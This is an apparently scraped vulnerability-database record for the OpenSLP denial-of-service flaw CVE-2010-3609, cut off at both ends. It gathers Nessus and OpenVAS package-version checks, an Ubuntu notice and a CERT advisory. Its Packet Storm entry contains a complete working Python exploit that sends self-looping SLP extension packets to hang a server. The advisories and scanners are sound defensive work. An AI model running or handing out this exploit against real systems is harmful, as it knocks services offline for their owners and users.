script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(6\\.06|8\\.04|9\\.10|10\\.04|10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 9.10 / 10.04 / 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libslp1\", pkgver:\"1.2.1-5ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libslp1\", pkgver:\"1.2.1-7.1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libslp1\", pkgver:\"1.2.1-7.5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libslp1\", pkgver:\"1.2.1-7.6ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libslp1\", pkgver:\"1.2.1-7.7ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libslp1\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:13:46", "description": "openslp: denial of service vulnerability (CVE-2010-3609)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2015-05-29T00:00:00", "title": "Fedora 20 : openslp-1.2.1-22.fc20 (2015-7561)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609", "CVE-2012-4428"], "modified": "2015-05-29T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:openslp"], "id": "FEDORA_2015-7561.NASL", "href": "https://www.tenable.com/plugins/nessus/83890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-7561.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83890);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-3609\", \"CVE-2012-4428\");\n script_xref(name:\"FEDORA\", value:\"2015-7561\");\n\n script_name(english:\"Fedora 20 : openslp-1.2.1-22.fc20 (2015-7561)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"openslp: denial of service vulnerability (CVE-2010-3609)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=684294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=857242\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/159059.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6f58f5f1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openslp package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"openslp-1.2.1-22.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openslp\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T00:35:21", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3609"], "description": "It was discovered that OpenSLP incorrectly handled certain corrupted \nmessages. A remote attacker could send a specially crafted packet to \nthe OpenSLP server and cause it to hang, leading to a denial of service.", "edition": 5, "modified": "2011-04-20T00:00:00", "published": "2011-04-20T00:00:00", "id": "USN-1118-1", "href": "https://ubuntu.com/security/notices/USN-1118-1", "title": "OpenSLP vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:42:16", "bulletinFamily": "info", "cvelist": ["CVE-2010-3609"], "description": "### Overview \n\nOpenSLP contains a vulnerability in the handling of packets containing malformed extensions, which can result in a denial-of-service condition.\n\n### Description \n\nService Location Protocol is an IETF standards track protocol that provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks. The OpenSLP project is an effort to develop an open-source implementation of Service Location Protocol. When OpenSLP parses a SLP packet containing malformed extensions the extensions parser will enter an infinite loop causing a denial-of-service condition.\n\nIf an attacker creates a packet containing a \"next extension offset\" pointing to itself or to a previous extension, the extension's parser will enter an infinite loop consuming 100% of the CPU. \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to create a denial-of-service condition. \n \n--- \n \n### Solution \n\n**Upgrade or apply a patch from the vendor** \n \nPatches and updated versions of the software have been released to address this issue. Please see the Vendor Information section of this document for more information. \n \nUsers who compile their OpenSLP software from the svn distribution should checkout to the latest svn revision. According to the [revision update](<http://openslp.svn.sourceforge.net/viewvc/openslp?view=revision&revision=1647>) this vulnerability has been resolved in [revision 1647](<http://openslp.svn.sourceforge.net/viewvc/openslp?view=revision&revision=1647>). \n \n--- \n \n### Vendor Information\n\n393783\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Novell, Inc. Affected\n\nNotified: August 11, 2010 Updated: January 14, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2010-3609.html>\n\n### SUSE Linux Affected\n\nNotified: October 07, 2010 Updated: March 21, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2010-3609.html>\n\n### Ubuntu Affected\n\nUpdated: April 21, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://launchpad.net/ubuntu/+source/openslp-dfsg/1.2.1-7.7ubuntu0.1>\n * <https://launchpad.net/ubuntu/+source/openslp-dfsg/1.2.1-7.6ubuntu0.1>\n * <https://launchpad.net/ubuntu/+source/openslp-dfsg/1.2.1-7.5ubuntu0.1>\n * <https://launchpad.net/ubuntu/+source/openslp-dfsg/1.2.1-7.1ubuntu0.2>\n * <https://launchpad.net/ubuntu/+source/openslp/1.2.1-5ubuntu0.2>\n\n### VMware Affected\n\nNotified: August 12, 2010 Updated: March 16, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.vmware.com/security/advisories/VMSA-2011-0004.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * [http://openslp.svn.sourceforge.net/viewvc/openslp?view=revision&revision=1647](<http://openslp.svn.sourceforge.net/viewvc/openslp?view=revision&revision=1647>)\n * <http://support.novell.com/security/cve/CVE-2010-3609.html>\n * <http://www.vmware.com/security/advisories/VMSA-2011-0004.html>\n\n### Acknowledgements\n\nThanks to Nicolas Gregoire of Agarri for reporting this vulnerability.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-3609](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-3609>) \n---|--- \n**Severity Metric:** | 0.58 \n**Date Public:** | 2011-03-21 \n**Date First Published:** | 2011-03-21 \n**Date Last Updated: ** | 2011-04-21 15:28 UTC \n**Document Revision: ** | 23 \n", "modified": "2011-04-21T15:28:00", "published": "2011-03-21T00:00:00", "id": "VU:393783", "href": "https://www.kb.cert.org/vuls/id/393783", "type": "cert", "title": "OpenSLP denial of service vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:45", "description": "", "published": "2011-07-26T00:00:00", "type": "packetstorm", "title": "SLP (Service Location Protocol) Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3609"], "modified": "2011-07-26T00:00:00", "id": "PACKETSTORM:103443", "href": "https://packetstormsecurity.com/files/103443/SLP-Service-Location-Protocol-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/python \n \n''' ================================== \nPseudo documentation \n================================== ''' \n \n# SLPick, extension DoS release \n# by Nicolas Gregoire \n \n''' ================================== \nImports \n================================== ''' \n \nimport getopt \nimport re \nimport sys \nimport binascii \nimport struct \nimport socket \nimport os \n \n \n''' ================================== \nDefault values \n================================== ''' \n \nversion = '0.4' \nmode = 'unicast' \nsource = 'N/A' \ntarget = 'N/A' \nxid = '\\x12\\x34' \nport = 427 \nnb = 1 \nreq = 'sr' \n \n''' ================================== \nStandard functions \n================================== ''' \n \n# Some nice formatting \ndef zprint(str): \nprint '[=] ' + str \n \n# Function displaying CLI arguments \ndef showUsage(): \nprint 'Usage : ' + sys.argv[0] + ' [-h] [-m mode] [-p port] [-n number] [-s source_IP] [-t target_IP]' \nprint '\\t[-h] Help (this text)' \nprint '\\t[-m] Mode : tcp / unicast / broadcast / multicast (default is \"' + mode + '\")' \nprint '\\t[-p] Port : default is \"' + str(port) + '\"' \nprint '\\t[-s] Source IP Adress : no default (used only in multicast mode)' \nprint '\\t[-t] Target IP Adress : no default (forced in multicast mode)' \nprint '\\t[-n] Number of extensions : 0 (no bug) / 1 (default) / 2 (trailing extension)' \nprint '\\t[-r] Request type : sr (ServerRequest, default) / ar (AttributeRequest)' \nsys.exit(1) \n \n# Function parsing parameters \ndef getArguments(): \ntry: \noptlist, list = getopt.getopt(sys.argv[1:], 'hm:p:t:s:n:r:') \nexcept getopt.GetoptError: \nshowUsage() \nfor opt in optlist: \nif opt[0] == '-h': \nshowUsage() \nif opt[0] == '-p': \nglobal port \nport = opt[1] \nif opt[0] == '-s': \nglobal source \nsource = opt[1] \nif opt[0] == '-t': \nglobal target \ntarget = opt[1] \nif opt[0] == '-m': \nglobal mode \nmode = opt[1] \nif opt[0] == '-n': \nglobal nb \nnb = int(opt[1]) \nif opt[0] == '-r': \nglobal req \nreq = opt[1] \n \n# Function checking parameters \ndef checkArguments(): \nif (mode == 'multicast'): \n# XID : must be 0 in multicast mode \n# Target IP : default SLP multicast address \n# Source IP : address of the local interface \nglobal xid \nxid = '\\x00\\x00' \nzprint('Forcing XID to \"0\"') \nglobal target \ntarget = '239.255.255.253' \nzprint('Forcing target IP to \"' + target + '\"') \nif (source != 'N/A') : \nzprint('Forcing source IP to \"' + source + '\"') \nelse: \nzprint('You need to force the source address with \"-s\" !') \nshowUsage() \nelif (mode == 'unicast') or (mode == 'broadcast') or (mode == 'multicast') or (mode == 'tcp'): \n# Target IP : must be defined \nif (target == 'N/A') : \nzprint('Invalid target !') \nshowUsage() \nelse : \nzprint('Invalid mode !') \nshowUsage() \n \n''' ================================== \nSLP functions \n================================== ''' \n \n# Define payload of type \"Service Request\" \ndef getServRequest(): \n \nzprint('Creating payload of type \"Service Request\"') \n \n# Function type \nf = '\\x01' \n# Empty fields \nprevious_list_length = '\\x00\\x00' \npredicate_length = '\\x00\\x00' \nscope_length = '\\x00\\x00' \nspi_length = '\\x00\\x00' \n# Variable-size fields \nservice = 'service:directory-agent' \nservice_length = struct.pack('!h', len(service)) \n# Create message \nm = previous_list_length + service_length + service \nm += predicate_length + scope_length + spi_length \n \nreturn(f, m) \n \n# Define payload of type \"Attribute Request\" \ndef getAttrRequest(): \n \nzprint('Creating payload of type \"Attribue Request\"') \n \n# Function type \nf = '\\x06' \n# Empty fields \nprevious_list_length = '\\x00\\x00' \ntag_length = '\\x00\\x00' \nspi_length = '\\x00\\x00' \n# Variable-size fields \nurl = 'http://www.agarri.fr/' \nurl_length = struct.pack('!h', len(url)) \nscope = 'default' \nscope_length = struct.pack('!h', len(scope)) \n# Create message \nm = previous_list_length \nm += url_length + url + scope_length + scope \nm += tag_length + spi_length \n \nreturn(f, m) \n \n# Define the function creating the full SLP packet \ndef createPacket(function, message): \n \nzprint('Adding headers and trailers') \n \n# SLP Version \nversion = '\\x02' \n# Set the 'Multicast required' flag to 1 \nif (mode == 'broadcast' or mode == 'multicast'): \nflags = '\\x20\\x00' \nelse: \nflags = '\\x00\\x00' \n \n####################################################### \n# Here's the bug !!!! \n####################################################### \nzprint('Using ' + str(nb) + ' extension(s)') \nif (nb == 0): \n# No extension == no bug \nnext_ext_offset = '\\x00\\x00\\x00' \nextension = '' \nelif (nb == 1): \n# Loop over itself \nnext_ext_offset = '\\x00\\x00\\x05' \nextension = '' \nelif (nb == 2) : \n# Point to another extension located at the end of the packet \n# TODO : Calculate it at runtime \nif (req == 'sr'): \nnext_ext_offset = '\\x00\\x00\\x31' \nelse : \nnext_ext_offset = '\\x00\\x00\\x36' \n# OpenSLP : extid should be < 0x4000 or > 0x7FFF \next_id = '\\xBA\\xBE' \n# Loop over itself, 0x05 (back to previous extension) should work too \next_nextoffset = next_ext_offset \n# Could be anything \next_data = '\\x22\\x22' \n# Create the trailing extension \nextension = ext_id + ext_nextoffset + ext_data \nelse: \nprint 'Wrong number of extensions' \nsys.exit(1) \n \n# Variable-size headers \nlang = 'en' \nlang_length = struct.pack('!h', len(lang)) \n \n# Assemble headers \nheaders = flags + next_ext_offset + xid + lang_length + lang \n \n# Packet = version + function + overall size + headers + message + extension \npacket = version + function + '\\x00' \npacket += struct.pack('!h', len(headers + message + extension) + 5) \npacket += headers + message + extension \n \nreturn packet \n \n''' ================================== \nSend packet via TCP or UDP \n================================== ''' \n \n# Send via TCP \ndef sendTcpPacket(packet): \n \nzprint('Sending packet via TCP [' + target + ']') \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.settimeout(3) \ntry: \ns.connect((target, port)) \nexcept socket.error: \nzprint('Socket error (port closed ?)') \nsys.exit(1) \ns.send(packet) \ns.close \n \n# Send via unicast UDP \ndef sendUnicastPacket(packet): \n \nzprint('Sending packet via Unicast UDP [' + target + ']') \ns = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) \ns.sendto( packet, (target, port) ) \n \n# Send via broadcast UDP \ndef sendBroadcastPacket(packet): \n \nzprint('Sending packet via Broadcast UDP [' + target + ']') \ns = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) \ns.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) \ns.sendto( packet, (target, port) ) \n \n# Send via multicast UDP \ndef sendMulticastPacket(packet): \n \nzprint('Sending packet via Multicast UDP [' + target + ']') \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) \nsock.bind((source, 6666)) # Select an interface (and an evil port ;-) \nsock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) \nsock.sendto(packet, (target, port) ); \n \n''' ================================== \nMain code \n================================== ''' \n \n# Print banner \nzprint('SLPick : SLP client v' + version + ' (by Nicolas Gregoire)') \n \n# Set options \ngetArguments() \ncheckArguments() \n \n# Which payload ? \nif (req == 'ar'): \nfunc, payload = getAttrRequest() \nelse : \nfunc, payload = getServRequest() \n \n# Add headers and trailers (including extensions) \npacket = createPacket(func, payload) \n \n# TCP \nif (mode == 'tcp'): \nsendTcpPacket(packet) \n# UDP \nelif (mode == 'unicast'): \nsendUnicastPacket(packet) \nelif (mode == 'broadcast'): \nsendBroadcastPacket(packet) \nelif (mode == 'multicast'): \nsendMulticastPacket(packet) \n \n# Exit \nzprint('Exit') \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/103443/SLPick.py.txt"}], "openvas": [{"lastseen": "2019-05-29T18:39:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1118-1", "modified": "2019-03-13T00:00:00", "published": "2011-05-10T00:00:00", "id": "OPENVAS:1361412562310840637", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840637", "type": "openvas", "title": "Ubuntu Update for openslp-dfsg USN-1118-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1118_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openslp-dfsg USN-1118-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1118-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840637\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-10 14:04:15 +0200 (Tue, 10 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"USN\", value:\"1118-1\");\n script_cve_id(\"CVE-2010-3609\");\n script_name(\"Ubuntu Update for openslp-dfsg USN-1118-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|9\\.10|6\\.06 LTS|10\\.10|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1118-1\");\n script_tag(name:\"affected\", value:\"openslp-dfsg on Ubuntu 10.10,\n Ubuntu 10.04 LTS,\n Ubuntu 9.10,\n Ubuntu 8.04 LTS,\n Ubuntu 6.06 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that OpenSLP incorrectly handled certain corrupted\n messages. A remote attacker could send a specially crafted packet to\n the OpenSLP server and cause it to hang, leading to a denial of service.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.6ubuntu0.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.5ubuntu0.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-5ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.7ubuntu0.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.1ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-06T13:07:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "description": "Check for the Version of openslp", "modified": "2018-01-05T00:00:00", "published": "2012-08-24T00:00:00", "id": "OPENVAS:831727", "href": "http://plugins.openvas.org/nasl.php?oid=831727", "type": "openvas", "title": "Mandriva Update for openslp MDVSA-2012:141 (openslp)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for openslp MDVSA-2012:141 (openslp)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered and corrected in openslp:\n\n The extension parser in slp_v2message.c in OpenSLP 1.2.1 allows\n remote attackers to cause a denial of service (infinite loop) via a\n packet with a next extension offset that references this extension\n or a previous extension (CVE-2010-3609).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"openslp on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:141\");\n script_id(831727);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-24 09:57:24 +0530 (Fri, 24 Aug 2012)\");\n script_cve_id(\"CVE-2010-3609\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2012:141\");\n script_name(\"Mandriva Update for openslp MDVSA-2012:141 (openslp)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openslp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenslp1\", rpm:\"libopenslp1~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenslp1-devel\", rpm:\"libopenslp1-devel~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1\", rpm:\"lib64openslp1~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1-devel\", rpm:\"lib64openslp1-devel~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenslp1\", rpm:\"libopenslp1~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != 